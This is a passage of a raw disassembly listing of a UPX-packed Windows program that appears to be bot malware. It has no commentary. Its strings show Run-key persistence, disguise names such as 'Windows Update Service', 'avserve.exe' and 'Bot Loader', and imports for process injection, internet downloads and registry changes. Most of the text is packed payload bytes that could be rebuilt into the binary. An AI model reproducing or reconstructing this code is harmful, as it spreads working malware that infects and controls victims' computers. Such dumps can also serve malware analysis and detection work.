'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0 ; DATA XREF: sub_314221C4+23o ; sub_314229E6+66o ... align 4 aCryptographicS db 'Cryptographic Service',0 ; DATA XREF: sub_314221C4+1Co ; sub_31422A9B+87o ... align 10h aFgnsdrjyrsert db 'fgnsdrjyrsert',0 ; DATA XREF: sub_314215C7+4Fo ; sub_31422B67+57o ... align 10h dd 2 dup(0) aSoftwareMicr_0 db 'Software\Microsoft\Wireless',0 ; DATA XREF: sub_31422B67+32o aClient db 'Client',0 ; DATA XREF: sub_31422B67+BCo ; sub_31422B67+F8o align 4 aId db 'ID',0 ; DATA XREF: sub_31422B67+37o ; sub_31422B67+75o align 10h aWindowsUpdate db 'Windows Update',0 ; DATA XREF: sub_314229E6+55o align 10h aMsConfigV13 db 'MS Config v13',0 ; DATA XREF: sub_314229E6+4Eo align 10h aAvserve2_exeup db 'avserve2.exeUpdate Service',0 ; DATA XREF: sub_314229E6+47o align 4 aAvserve_exe db 'avserve.exe',0 ; DATA XREF: sub_314229E6+40o aWindowsUpdateS db 'Windows Update Service',0 ; DATA XREF: sub_314229E6+39o align 10h aWinupdate db 'WinUpdate',0 ; DATA XREF: sub_314229E6+32o align 4 aSystray db 'SysTray',0 ; DATA XREF: sub_314229E6+2Bo aBotLoader db 'Bot Loader',0 ; DATA XREF: sub_314229E6+24o align 10h aSystemRestoreS db 'System Restore Service',0 ; DATA XREF: sub_314229E6+1Do align 4 aDiskDefragment db 'Disk Defragmenter',0 ; DATA XREF: sub_314229E6+16o align 4 aWindowsSecurit db 'Windows Security Manager',0 ; DATA XREF: sub_314229E6+Fo align 4 a1: ; DATA XREF: sub_31422B67+B7o unicode 0, <1>,0 dd 7 dup(0) dword_31424FE8 dd 0 ; sub_314221C4+80w dword_31424FEC dd 0 ; sub_314216A2+53o ... dword_31424FF0 dd 0 ; sub_3142207E:loc_3142212Cr ... dword_31424FF4 dd 0 ; UPX0:3142235Cw ... dword_31424FF8 dd 0 ; sub_314223B2+CEw dword_31424FFC dd 0 ; sub_31422712+20r dword_31425000 dd 31420000h ; UPX0:31422341w dword_31425004 dd 0 ; sub_314216A2+4Ao ... dword_31425008 dd 0 ; UPX0:314227C1w word_3142500C dw 0 ; DATA XREF: sub_3142255F+3Br ; sub_314225C3:loc_31422624r ... align 10h dword_31425010 dd 0 ; sub_31422B67+110w align 1000h UPX0 ends ; Section 2. (virtual address 00006000) ; Virtual size : 00002000 ( 8192.) ; Section size in file : 00002000 ( 8192.) ; Offset to raw data for section: 00006000 ; Flags E0000060: Text Data Executable Readable Writable ; Alignment : default ; =========================================================================== ; Segment type: Pure code ; Segment permissions: Read/Write/Execute UPX1 segment para public 'CODE' use32 assume cs:UPX1 ;org 31426000h assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing dword_31426000 dd 0C4h, 40h, 72695601h, 6C617574h, 65657246h, 69560100h ; DATA XREF: UPX1:31427BB1o dd 61757472h, 6C6C416Ch, 100636Fh, 4D746547h, 6C75646Fh dd 6C694665h, 6D614E65h, 1004165h, 7274736Ch, 69706D63h dd 43010041h, 4679706Fh, 41656C69h, 69570100h, 6578456Eh dd 43010063h, 74616572h, 6F6F5465h, 6C65686Ch, 53323370h dd 7370616Eh, 746F68h, 6F725001h, 73736563h, 69463233h dd 747372h, 72655401h, 616E696Dh, 72506574h, 7365636Fh dd 50010073h, 65636F72h, 32337373h, 7478654Eh, 736C0100h dd 70637274h, 1004179h, 61657243h, 76456574h, 41746E65h dd 61570100h, 6F467469h, 6E695372h, 4F656C67h, 63656A62h dd 44010074h, 74656C65h, 6C694665h, 1004165h, 74697257h dd 6C694665h, 43010065h, 65736F6Ch, 646E6148h, 100656Ch dd 61657243h, 69466574h, 41656Ch, 74736C01h, 6E656C72h dd 6C010041h, 63727473h, 417461h, 74654701h, 74737953h dd 69446D65h, 74636572h, 4179726Fh, 65470100h, 636F4C74h dd 49656C61h, 416F666Eh, 6C530100h, 706565h, 746E4901h dd 6F6C7265h, 64656B63h, 68637845h, 65676E61h, 736C0100h dd 70637274h, 416E79h, 74654701h, 72727543h, 50746E65h dd 65636F72h, 1007373h, 50746547h, 41636F72h, 65726464h dd 1007373h, 64616F4Ch, 7262694Ch, 41797261h, 72570100h dd 50657469h, 65636F72h, 654D7373h, 79726F6Dh, 704F0100h dd 72506E65h, 7365636Fh, 47010073h, 6F4D7465h, 656C7564h dd 646E6148h, 41656Ch, 74654701h, 6B636954h, 6E756F43h dd 43010074h, 74616572h, 74754D65h, 417865h, 65724301h dd 54657461h, 61657268h, 43010064h, 74616572h, 6F725065h dd 73736563h, 53010041h, 76457465h, 746E65h, 65704F01h dd 6576456Eh, 41746Eh, 69784501h, 72685474h, 646165h, 746E4901h dd 6F6C7265h, 64656B63h, 72636E49h, 6E656D65h, 52010074h dd 46646165h, 656C69h, 74654701h, 656C6946h, 657A6953h dd 78450100h, 72507469h, 7365636Fh, 47010073h, 614C7465h dd 72457473h, 726F72h, 0D100h, 0 dd 65520100h, 65724367h, 4B657461h, 78457965h, 52010041h dd 65536765h, 6C615674h, 78456575h, 52010041h, 75516765h dd 56797265h, 65756C61h, 417845h, 67655201h, 6E65704Fh dd 4579654Bh, 1004178h, 44676552h, 74656C65h, 6C615665h dd 416575h, 67655201h, 736F6C43h, 79654B65h, 62410100h dd 5374726Fh, 65747379h, 7568536Dh, 776F6474h, 100416Eh dd 70797243h, 65724374h, 48657461h, 687361h, 79724301h dd 61487470h, 61446873h, 1006174h, 70797243h, 72655674h dd 53796669h, 616E6769h, 65727574h, 43010041h, 74707972h dd 74736544h, 48796F72h, 687361h, 79724301h, 65447470h dd 6F727473h, 79654B79h, 72430100h, 52747079h, 61656C65h dd 6F436573h, 7865746Eh, 43010074h, 74707972h, 75716341h dd 43657269h, 65746E6Fh, 417478h, 79724301h, 6D497470h dd 74726F70h, 79654Bh, 0DE00h, 0EC00h, 72730100h, 646E61h dd 6D656D01h, 797063h, 72747301h, 6E656Ch, 6D656D01h, 746573h dd 6E617201h, 5F010064h, 65637865h, 685F7470h, 6C646E61h dd 337265h, 72747301h, 727473h, 72747301h, 726863h, 0E900h dd 11000h, 69460100h, 6957646Eh, 776F646Eh, 47010041h dd 6F467465h, 72676572h, 646E756Fh, 646E6957h, 100776Fh dd 57746547h, 6F646E69h, 72685477h, 50646165h, 65636F72h dd 64497373h, 73770100h, 6E697270h, 416674h, 0F400h, 12400h dd 6E490100h, 6E726574h, 704F7465h, 72556E65h, 100416Ch dd 65746E49h, 74656E72h, 6E65704Fh, 49010041h, 7265746Eh dd 4374656Eh, 65736F6Ch, 646E6148h, 100656Ch, 65746E49h dd 74656E72h, 43746547h, 656E6E6Fh, 64657463h, 74617453h dd 49010065h, 7265746Eh, 5274656Eh, 46646165h, 656C69h dd 10000h, 13C00h, 73FF00h, 0FF0002FFh, 1FF000Dh, 39FF00h dd 0FF006FFFh, 17FF0034h, 0CFF00h, 0FF0009FFh, 13FF0004h dd 10FF00h, 0FF0016FFh, 3, 50000000h, 4C000045h, 0C8000201h dd 40D859h, 0 dd 0E0000000h, 0B010F00h, 601h, 26h, 12h, 34000000h, 23h dd 10h, 40h, 314200h, 10h, 4000002h, 0 dd 4000000h, 2 dup(0) dd 60h, 4, 2000000h, 0 dd 1000h, 10h, 1000h, 10h, 10000000h, 2 dup(0) dd 34000000h, 8C00002Dh, 15h dup(0) dd 7C000010h, 1, 5 dup(0) dd 2E000000h, 74786574h, 56000000h, 24h, 10h, 26h, 4, 2 dup(0) dd 20000000h, 2EE00400h, 61746164h, 14000000h, 10h, 40h dd 10h, 2Ah, 2 dup(0) dd 40000000h, 0C00000h, 3C000050h, 0C300002Fh, 0A1000054h dd 89254BBEh, 0DB43AA85h, 0AEF070A0h, 92A2047Dh, 4EC00F3Ch dd 27BE81Ch, 8402F26Ah, 47FC7D1Bh, 0F0024A19h, 0A033E402h dd 2164868h, 0D2B735D7h, 0A73D7D03h, 769F6801h, 36E6CCE6h dd 3A4A2064h, 1B5AB7CCh, 0DC87B734h, 6A7684E0h, 96F42A70h dd 0E6C8E38Ch, 5EC86080h, 7A97640Ah, 273E1B25h, 0A2280084h dd 364B003Fh, 3CD9B96Bh, 98B9B26Ch, 0E477BDE2h, 0DC016754h dd 317E500Fh, 0C777C3E4h, 0AC683B0Dh, 0D328C00Dh, 0B138CEDCh dd 0E56F08C9h, 0DB0C7A04h, 0D2484522h, 0DD2DC5F8h, 0D61B212Fh dd 402EDB1Ch, 67012DEh, 4C9039ECh, 40BCF844h, 0C27190D6h dd 1BDE5044h, 593B1E10h, 94B7336Fh, 8121970Dh, 67E9ACF9h dd 0E87CFEEBh, 1624A580h, 68250600h, 259D1C52h, 1CF25B07h dd 96F41276h, 899DE9C3h, 940AEF65h, 7BC87C6Ah, 64B1E3C3h dd 0C9BE490Ch, 991DD97Bh, 90E154E4h, 8C9FE924h, 0DCCCC349h dd 0CF78242Eh, 2C8248EDh, 0F864052Ch, 66F4150Ch, 3319A002h dd 8707A23h, 8F895E74h, 0F4C6DD0Eh, 1C51CC5Fh, 80B3EF9Ch dd 7F24E4A1h, 5A435A8h, 0B5D0781Bh, 571282F8h, 5A745737h dd 0ACBF931h, 74F80E14h, 9A0684Bh, 0CA28B753h, 2D3D74CEh dd 67ED85C9h, 0A0412069h, 0FFC55FFh, 35BAB9E8h, 50E49ED7h dd 0E9628ACh, 5B3002F0h, 5547BF4Dh, 8C0009F8h, 681583E4h dd 0F475583Bh, 1887EE42h, 851321C5h, 0A90A508Bh, 0BFF77FB6h dd 3C418B2Fh, 68C10357h, 488B4D2Ch, 50788B34h, 0A0F44D89h dd 0EE062AB4h, 1C68D84Bh, 5D97D81Bh, 0F0F559AAh, 868D201h dd 0C18DEC12h, 0ED74C3B1h, 1110D70Dh, 0F46F0E82h, 1409B26Ah dd 0F84DF123h, 91762C51h, 18185085h, 892A6897h, 6C54A0E9h dd 0CA405DB0h, 46C0ED03h, 0EB346B63h, 9AAB1930h, 596ED578h dd 37DF055h, 0AB6745E6h, 0F03EDD4Bh, 53503151h, 9E0AC1Eh dd 0F435C4F7h, 17FAD6BDh, 3FEA6D6Ah, 5577D0F1h, 74C73BECh dd 1BEB5805h, 5AE57E17h, 25348CBFh, 5FC0E59h, 36E7345Fh dd 740807EBh, 0E1FC58EFh, 5F521E86h, 602F5151h, 0B269310Fh dd 5C91A144h, 0BAB8250Dh, 0DD20DB42h, 0B213B1AFh, 1133AEECh dd 2D590FEBh, 0B66AF9C2h, 99EDC4B1h, 0C803CBCh, 1450A850h dd 7D2774D6h, 5DC02C50h, 4459FC19h, 437C20BAh, 247C8B57h dd 0A5C58314h, 7E11D25Ah, 641A8717h, 803FFFF5h, 148861C2h dd 0F73B461Eh, 2480E97Ch, 0C68C003Bh, 54D5D6DBh, 5F2E448Bh dd 5657AC5Ah, 30181DDBh, 2F216674h, 8896DC73h, 50F02EEDh dd 565019h, 3C3ACAAh, 9577E134h, 49F44DC4h, 8F6B6E8Ch dd 0F00CFA68h, 0C908C7FFh, 349B6996h, 2E2ACC34h, 99AD734Ch dd 0A0A75EDh, 1A20BC50h, 3E160118h, 7C654A1h, 13B7FB8h dd 0ADF1CE74h, 8B0C407Dh, 51080100h, 5F24448Dh, 9B613421h dd 0D31130C5h, 74245903h, 7F84EE8h, 7BBCC15h, 662FC820h dd 3333C7FBh, 0C1F8C8E4h, 0B8510E7h, 4679B0D4h, 8B0200B6h dd 33125Dh, 0F3702647h, 19DC201h, 53C4EAC9h, 0A311E3C6h dd 0F2B57B35h, 0C3255035h, 26B69D83h, 0ADE74880h, 40666CB5h dd 41F0179Eh, 0BB683595h, 98CEE331h, 0B76C683Dh, 474FF044h dd 19B1606Ch, 0A54D54FEh, 2CC5D314h, 7C54DADCh, 0FC0DFE00h dd 33A134BAh, 2B7900B9h, 72C13BC7h, 72C18B02h, 0E1EBB76Fh dd 0E8A1292Bh, 23C70318h, 0FE25A3ACh, 233DCC96h, 786A1172h dd 0DA3140F8h, 0C4EB3C28h, 7750E113h, 6CF64F26h, 941ED411h dd 0CD3C6815h, 0BEE4D62h, 97386803h, 9D663E3Ch, 54533AB5h dd 0D0835253h, 8C47E0B1h, 4C29824h, 136D8223h, 0E643098h dd 0E8D0B1F7h, 8C316D4h, 0BBEE4E29h, 89574377h, 80686806h dd 27841D89h, 5D4F7E18h, 14EC6DA2h, 0F2D4C0h, 0C1345391h dd 27B6B6Ch, 80EB3A01h, 9AD468E6h, 1A4DFD77h, 0B34A3678h dd 0DCCD2F74h, 677A5EA3h, 0A3650C75h, 53FCA4FEh, 1AD9D251h dd 3A865613h, 0DC3E68D8h, 2656D88Ch, 58195EF9h, 0F8DA6A12h dd 5E0510C2h, 0EF4B56C0h, 0C6697A4h, 0EC5D89E8h, 0DFFF050Dh dd 25EDF760h, 3A041FFFh, 43FCA3C3h, 8A1FE774h, 5FC984CCh dd 74E849BDh, 0EA6B50DFh, 64405F42h, 0A51985BAh, 440C6465h dd 2BE9AFA3h, 14F85F7Bh, 9E481FD8h, 0FACEADECh, 15207E68h dd 0E2EB624Eh, 5CC1CF53h, 455FE142h, 0AC019043h, 70661D7Bh dd 0B0333CAEh, 0D30711D6h, 23EDB43h, 803AD6E6h, 9B0D0AF9h dd 0ABB068B4h, 74E063A3h, 822B01D8h, 0F4A37B7Ch, 8609D9FBh dd 0B73DE4CDh, 29E04552h, 0EECDF670h, 1904640Dh, 68631BE2h dd 0EC1323B2h, 5C344FB5h, 1386EB13h, 0B06099AEh, 3569FB1Ah dd 397044F8h, 90252C40h, 0D2908F93h, 70CDC864h, 90458C13h dd 9406EF5Ch, 72391C54h, 9C4C98E4h, 0A43CA044h, 47239134h dd 0AC2CA88Eh, 391CB024h, 0B4C8E472h, 0BC14B818h, 9F0CC010h dd 0C41C8E47h, 0CC04C808h, 0F8D04DFCh, 2391C8E4h, 0F0D8F4D4h dd 85AEECDCh, 0E8E07239h, 487E4E4h, 8B66BDh, 0A36CD337h dd 0B978DADEh, 2FCB06Dh, 7309838Ch, 0EC8C3412h, 415C0376h dd 4A8D9085h, 0EB0CFF59h, 4D8D1AE8h, 0B40DE438h, 0C9391A5Ch dd 870BF07Ch, 0D4683974h, 37A8AB4Dh, 0B6326277h, 0C4064DCCh dd 843E0D6Dh, 9ABC4984h, 4E570465h, 2ADB3B72h, 0A341521h dd 276E16A2h, 41173E3Ah, 5F9A2842h, 7D21E014h, 0F818B4E8h dd 0EB9C1388h, 0C28242E3h, 5A159993h, 1B6095AFh, 63554703h dd 0DE7FA480h, 0AD11F0AAh, 0B458A51h, 32FF6A9Eh, 80C1EDDBh dd 0CC3A52C3h, 0DC5D3831h, 0F108FE3Ah, 0B5D8825h, 0FFD07D2h dd 5A0C35B7h, 0F80CFF59h, 0F7990F93h, 8ED603FEh, 0FB80C3FEh dd 2ED572FFh, 5EBDC65Bh, 5F7662BAh, 9813B264h, 68336F04h dd 56DA0958h, 81084F38h, 0C70D040Ah, 9DB59B0h, 80758F0Bh dd 609B492Dh, 5FF90F75h, 1E892C25h, 3D9DADE4h, 3FF8432h dd 0FB8143D7h, 0B50DBE71h, 5F9F9623h, 6BA65D87h, 7B4F3B16h dd 6DA25A73h, 0E6573C19h, 9973002Fh, 0FDBE78B7h, 0F6FEFF04h dd 61887F3Ch, 33FC6C5Bh, 88BF50Fh, 0AADCF33Bh, 0D8B3B276h dd 57A0A33Eh, 9C572F9Eh, 2259ED9h, 1359F8D6h, 256E25C3h dd 0B3BBFF0Eh, 0C3F2EE75h, 68E1AC8Eh, 0D3A62710h, 969ED3BEh dd 84C1C180h, 50A92D70h, 1052AD62h, 8FC2454Eh, 0BA6032F5h dd 0F2AA5C6Ah, 0E0F9DCDFh, 0BFC3A4Ch, 6468B003h, 372DD4Eh dd 11103B06h, 0D742BA27h, 6CE012F7h, 0B80C609h, 0B02B39DFh dd 556F0BB0h, 84579356h, 80CC78D8h, 5113E6D8h, 68661C4Dh dd 0FD1F0CA5h, 0D91462F4h, 538906EEh, 20BF661h, 838506Ah dd 0A05BFDAFh, 0D2052C5Dh, 18740096h, 73071109h, 1001478Dh dd 141905h, 9DD8513h, 1706D84Fh, 42BDAA0Eh, 74F081DBh dd 0C7D5530Dh, 0BE111051h, 392101E1h, 3A18244Ch, 7EED85EDh dd 0D876D811h, 264BA586h, 0EF144D2Ch, 6C192596h, 0EBA20577h dd 8B750DF2h, 65B8B076h, 68FADDEBh, 0C11B333Fh, 968160C8h dd 77D0150Ch, 6EA96236h, 90140810h, 2F874BA3h, 5618D951h dd 0D8D85CFCh, 0F61837B2h, 743D563Eh, 6311CE05h, 61412ADCh dd 0B74B2C9Ch, 102050D3h, 59030818h, 0AA0B62FCh, 8B550F5Eh dd 5ACEE1C6h, 2E33A257h, 56532C56h, 0C9901884h, 25270055h dd 5ACE5903h, 40C520Ah, 9262CF20h, 28AF5D0Ch, 89E2B701h dd 21DE53C3h, 948E694Eh dd 13F6F438h, 5C1E3C34h, 0F7794E36h, 43ADDE04h, 281D146Ch dd 687AA42Dh, 92C1EC35h, 0F4D85A2Dh, 22F40910h, 0CF203BD0h dd 0EEF8367Ah, 477D221Dh, 11E748Dh, 0F556FC7Bh, 4804C1FEh dd 0B5FF1C1Eh, 0B9B345E0h, 0FF452F20h, 8521F0Fh, 61C35760h dd 1C465033h, 3489BD76h, 0B733A074h, 57D6A93Ch, 0D91B1C8h dd 984FACB6h, 1C80D406h, 0D8E47239h, 0E06CDC74h, 9148E460h dd 0E88E4723h, 0F020EC3Ch, 1934D110h, 0B700F4CCh, 63BF0B84h dd 647CE261h, 8B7EF9BEh, 0A16451A2h, 0B4C43D18h, 0CBD83608h dd 0E177572h, 0A64D1D49h, 2A099E9Ah, 0BDA3833Eh, 8A460975h dd 7888E044h, 8C47F46Ah, 0B40974B0h, 6A885974h, 8BB38163h dd 84BCDE59h, 7A2F22A1h, 0E0833FC1h, 5C08303h, 86B9CD57h dd 0FD594A8Bh, 509D10CFh, 3D12186Eh, 1C3DD607h, 0E26EE66h dd 50E83F14h, 982CEF42h, 2040A261h, 4B7CCA41h, 0D7C63F68h dd 0CC59B306h, 1B41D986h, 0CFA125D3h, 0B801F454h, 9681E007h dd 9F8B0F40h, 3EC18817h, 481FC517h, 5FD14C7h, 25596D30h dd 0E0B3BA10h, 0BF501D6Ah, 86103DD8h, 51FC71F0h, 1537743Fh dd 31583A06h, 60A7BB0Ah, 0BEFD8A06h, 0F45352D1h, 7EE6BC3Dh dd 3D53D8B3h, 0FEBB138h, 0A0C1CE59h, 0B632BDB3h, 38DE1B68h dd 65E265B0h, 0C868C226h, 5B373B4Fh, 0BB46D1F6h, 971A0DB9h dd 41D60B35h, 4C125E12h, 7A4EC6F0h, 0C631EE4Ah, 0B6413BBBh dd 2CFD90CCh, 90B610B5h, 480718B7h, 6015EB0Ch, 2D1880E5h dd 0AF1909CDh, 5132BA1Eh, 44330C5Dh, 0EC5B3D50h, 6A7D6883h dd 0CC401113h, 0F42A66E7h, 2806FF00h, 0A910F805h, 0F49199EFh dd 51001BF0h, 8DF7DF9Bh, 723B8D1Ah, 0BE98114h, 0AD85042Dh dd 1B1FDBEh, 2BEC7317h, 0CC48BC8h, 88BE18Bh, 0B5B236EAh dd 4353A302h, 45055C64h, 58363605h, 0A2000049h, 0F1022C02h dd 8F34BF14h, 52240206h, 80314153h, 0B77FFFFFh, 0F501018Fh dd 7911838Dh, 0E42AEC52h, 49E7F63Ah, 0BEE0EA9Bh, 7EDB21AFh dd 0FFFA9544h, 5E1AFFFFh, 85A03261h, 949F6A1Fh, 843994FFh dd 358F26A6h, 0A55C1DCEh, 7AB20BC9h, 0FF307265h, 371FFFFFh dd 697A6F4Dh, 2F616C6Ch, 20302E34h, 6D6F6328h, 69746170h dd 3B656C62h, 0FFFD4D20h, 4953FB5Bh, 15362045h, 6E695709h dd 73776F64h, 20544E20h, 29312E35h, 0D40BBB3Dh, 8EE434h dd 0C40104D4h, 0CF3DF7B4h, 90A00EF3h, 68047480h, 3CF3CF0Eh dd 480958DFh, 30D4743Ch, 64D937CFh, 10222045h, 0ED00304Ah dd 0F83E437Fh, 76631340h, 75722E76h, 0BDB6367Eh, 70077B5h dd 976C6465h, 0C1660F65h, 0FF7B7FF2h, 61657365h, 0E686372h dd 626F721Fh, 6863786Fh, 0DB676E61h, 0D2B9BB7Fh, 0C74651Fh dd 622E6472h, 61007A69h, 85D86328h, 6B68E46Dh, 740C6D61h dd 24782D06h, 0B9BB6DB3h, 6F6C0600h, 6B37620Eh, 0BEF6FD47h dd 276266Dh, 76742E7Ah, 6F74111Bh, 856E2E70h, 178C2D80h dd 27730F69h, 80FF0B33h, 0F788D6Dh, 6C756461h, 4B652D74h dd 7EDB7669h, 338072B3h, 73A66E6Fh, 622E744Eh, 0DF0AC07Dh dd 67694F67h, 77780032h, 5B7FB361h, 626A2CFBh, 9B00AD62h dd 6166617Ah, 0F84887A8h, 655D2EB6h, 61AF5C23h, 0F6EDF862h dd 656463FFh, 69686766h, 6D6C6B6Ah, 7271C56Eh, 777675F7h dd 0FFC67978h, 650E50DFh, 46454443h, 4A494847h, 4E4D4C4Bh dd 5451504Fh, 0FF68C3FFh, 57565554h, 1B5A5958h, 74746823h dd 2F2F3A70h, 3B9BF025h, 2F0B73B0h, 702E9765h, 7B3F7068h dd 0EB6FB7Eh, 73260F3Dh, 64066E63h, 666E6926h, 29073B76h dd 313D7DB7h, 74132639h, 58EBA01Bh, 60F6BBFBh, 3732313Dh dd 3A3101A8h, 2F303038h, 80FFDF65h, 0DFEC8Dh, 335DDFE8h dd 0EEB966C9h, 0FFDB6FFFh, 5758D01h, 68AFE8Bh, 4607993Ch dd 46302C06h, 7889934h, 0EBEDE247h, 0E8342FF7h, 7EDAE80Ah dd 2E6765DFh, 0C9999371h, 0DFFFEF01h, 0BDFD12FEh, 716FD91h dd 0AA6872C1h, 0AA66FD42h, 14BA10FDh, 1A98A91Ch, 0F75BB1FFh dd 0F198F3C9h, 71028608h, 5F9010C0h, 599237CBh, 0F931C96h dd 3A78B3FBh, 7157E414h, 713A0A7Dh, 0BEFB9D45h, 0F19DF3EDh dd 0F1098904h, 40119C04h, 0FD8EEDB3h, 0E3F36723h, 0DC1C10F0h dd 6059B20Bh, 3D8FC99Bh, 125EFF6h, 0A10414D9h, 9E71CA17h dd 61688D2Bh, 964617B3h, 0E21AAD91h, 28111D96h, 0ED6F6D9Fh dd 0C850B2h, 57DC1499h, 4E122555h, 0DFECC0A4h, 1291EDDEh dd 0F7ED9949h, 0C4140054h, 71CBCA3Ah, 87B31C3Bh, 24FFFDDDh dd 0CF1A21E4h, 668FCDCDh, 0FBB6812Ch, 1E3F6C9Fh, 83B8B0FBh dd 5D12CDC3h, 1DCBC9A8h, 6F9DB27Fh, 0B24AD25h, 96A6485Ah dd 0C9FECBC0h, 4C1B1464h, 0F3EBA729h, 0D9FFBA9Ch, 16E9B3F7h dd 7126F434h, 0F90EFCF5h, 29EF133Bh, 6FFF6B46h, 5F37F776h dd 0EC4766DEh, 116A0A8h, 0EDFFC5B7h, 0FDE9ECE9h, 0EF610FBBh dd 2CE1FCB7h, 0FCF5CA01h, 0FCF25AFCh, 0FDBFFFE5h, 0F5FCF7EBh dd 0C7D6ABAAh, 59AAF934h, 2A2A25B4h, 93ACC966h, 0BEB78190h dd 90FF67F0h, 0C983639Dh, 309271CDh, 513519BFh, 0A95D914h dd 0FFFF9172h, 712AEC20h, 0A5D2EBC8h, 0E180D512h, 6FAA529Ah dd 9A2A8D14h, 46FEDFC8h, 8B12B9FBh, 0C3474A9Ah, 0DB9BAB9Eh dd 0EC20A319h, 0FFDDA26Ch, 0BDFFFDBFh, 0DF9EED85h, 0EB81E8A2h dd 0C8125544h, 2E961FBDh, 0D812EB8Dh, 125A9A85h, 0FF9A099Dh dd 5ACD0B09h, 0D096F810h, 7F664922h, 8712FEFDh, 0BB6F6EDBh dd 95C25AA9h, 82128502h, 0CB5A9104h, 0F9B9CFF7h, 857F4067h dd 424D53FFh, 0C8531872h, 9CFF4BFh, 62FEFFh, 83435002h dd 4F575445h, 0E35BED52h, 50204BFFh, 52474F52h, 31204D41h dd 414C17CDh, 52024D4Eh, 0A6290EBh, 0B71566ABh, 0B75BB696h dd 0BB676B03h, 330E7075h, 0B61F611Ah, 4D27EB74h, 21583223h dd 2E323232h, 66D35831h, 2018D62Ah, 5A8B323Ch, 0A433C8C9h dd 0EC1B0773h, 0C2285DBh, 40023FFh, 20140A11h, 8DDADE05h dd 69A0D41Ah, 534B4C00h, 4915053h, 97B7887Fh, 4AE00882h dd 0EDF81773h, 6E240057h, 6F006400h, 3A730075h, 5EDEC874h dd 901306Ch, 3500398Ch, 0DCC06C23h, 72E1D96h, 32ABDA00h dd 889CF20h, 3B57DA20h, 9F4C9383h, 46F20003h, 0C1901E23h dd 40074706h, 0D1060006h, 1046E7FFh, 8A151F01h, 48E088h dd 8144004Fh, 0FE1BFFFDh, 0F27A6A19h, 281C49E4h, 742530AFh dd 0E1536710h, 137C853Ch, 3075DF5Ch, 0AEBD0400h, 75CB6B9h dd 5C085ABDh, 72363761h, 72E4DD7h, 2E380036h, 3B1B3077h dd 496D899Bh, 0E843EC00h, 0F9633F00h, 640E7900h, 4DC08A2h dd 6DFF20F6h, 0FF1640h, 0E00DEDEh, 19F1600h, 9BF2602h dd 28401213h, 0C1110319h, 8B7DC346h, 0D374D96Ch, 0BBE42970h dd 9C2A9BACh, 0D81D256Bh, 109F6DB3h, 1B04480Eh, 5D6DCF54h dd 5A5413D7h, 22596326h, 83CBC75Ch, 45B9FF34h, 58765h dd 4810030Bh, 0C5FFFFB8h, 0EB810DEh, 286A050Bh, 0B10C3919h dd 0A89B11D0h, 7D4FC000h, 0D9EC7FE1h, 5D5FF52Eh, 1CEB8A88h dd 0E89F11C9h, 48102B3Ch, 0B22E7C60h, 0F40CD197h, 0CA060A3h dd 95E43C80h, 0CB10CA0h, 32393BFEh, 880CA000h, 90040h dd 847B03ECh, 7F927h, 4F401495h, 0BF40707Ch, 6C8A5ECh dd 13430700h, 88FFC279h, 138578h, 0E9A65BABh, 18F81013h dd 2FE409CFh, 230EFEFFh dd 0D45830C1h, 8408BE40h, 7DD3E488h, 10B943D2h, 0B801FFEEh dd 79366110h, 0AD200CF2h, 9F7F070Dh, 0FF215E5h, 700118D8h dd 0F900F84h, 0F842579h, 4D000F95h, 206FC9Eh, 6C0F847Fh dd 84AADE0Fh, 0A89A0087h, 93F436Fh, 1F13C88Ch, 50586E69h dd 0C0A6DB20h, 7250CAh, 39014446h, 3C844FC9h, 123C6B32h dd 7B027515h, 413C840Dh, 941C0053h, 1CAFFF01h, 0C606EB22h dd 73255C5Ch, 6370695Ch, 9BFFF975h, 0EC816624h, 0E4FF071Ch dd 44655300h, 67756265h, 0FA377669h, 67853518h, 6A6441A7h dd 6F546175h, 0EC99B6E4h, 176E656Bh, 126F4C73h, 0BF6D7075h dd 61569FDDh, 4165756Ch, 28704F17h, 7324636Fh, 8D48EA58h dd 76430034h, 65333F61h, 0E33152A3h, 0F86D4C79h, 0F5056D1Bh dd 545F1165h, 57796172h, 95D52DB5h, 31431735h, 52521A61h dd 682DBB9Dh, 6854056Fh, 7356140Ch, 0A35B6B75h, 284158DBh dd 0A578454Fh, 77336D67h, 47356E3Ah, 121EF3F5h, 48F46897h dd 7F505454h, 5732203Ch, 0FDEF52B5h, 0D4B4F20h, 9F4B010Ah dd 6ADF6644h, 4C2D02BBh, 3A2D6704h, 18752520h, 0CA587B5Ah dd 7954282Fh, 0A66D26B5h, 70A3DAB6h, 15836386h, 8EA9EE2Fh dd 2DC7025Ah, 42C97293h, 9F56B18Bh, 2B004757h, 0A35B47BAh dd 0E564F6F4h, 42CB73CBh, 6D8D57FBh, 0A9637673h, 0DA6977CBh dd 0F1538B77h, 175F3203h, 9A69E775h, 7B5E62Eh, 36373803h dd 0A6BB2774h, 331F3435h, 32033369h, 0D34B75F2h, 13393031h dd 0C8383F38h, 370D8320h, 20353607h, 34320C83h, 909A3233h dd 3031C83Ah, 0F93AF378h, 0CC95ACFFh, 4F53BBD9h, 41575446h dd 4D5C4552h, 62C1F869h, 6F736F7Bh, 5CBF5CD7h, 72727543h dd 6B61BC22h, 73DC5615h, 75525C0Ah, 85B79F6Eh, 74231716h dd 6824D26Fh, 0FF532030h, 1B6850A3h, 673BE3F7h, 7264736Eh dd 1D93706Ah, 652B79B6h, 51530002h, 6612D86h, 6C0E5F06h dd 5736264Dh, 5F664B68h, 60C14923h, 34421C28h, 68FF5455h dd 130BC037h, 5E432053h, 0D5762067h, 0FB95B7B3h, 8058763Bh dd 0C823B532h, 7C65B05Eh, 0FC471A1Bh, 23596E66h, 79931217h dd 36346B73h, 4200707Eh, 61BF2063h, 0B7B5B623h, 6D1B1358h dd 0DD975220h, 0B4B63772h, 0E0440300h, 2F660E20h, 0EE7B25B0h dd 2AAC6D67h, 5B632463h, 22BFDAE4h, 20797469h, 1E6E614Dh dd 0AC31B81Ah, 74201501h, 2A2AAE89h, 0FD92BBC4h, 0EC01388Ch dd 65657246h, 0DBF0060Ch, 470DF923h, 6F4D7465h, 978A5F87h dd 6B4665E2h, 686D614Eh, 74736C01h, 0C01AEF7Bh, 0A956372h dd 79706F43h, 70A40A19h, 45A1816Fh, 4E326578h, 7C52FFF6h dd 6C6F6F54h, 32337067h, 70616E53h, 746F6873h, 4DADDD19h dd 32129C8Ah, 540F7372h, 14AD7305h, 182C358Fh, 80FB05B6h dd 78654E21h, 41616974h, 215FFD54h, 0F76451Eh, 7469616Bh dd 53726F46h, 0B6F6BA21h, 4F7B673Ch, 2C766A62h, 0D9B9E144h dd 8D225AC3h, 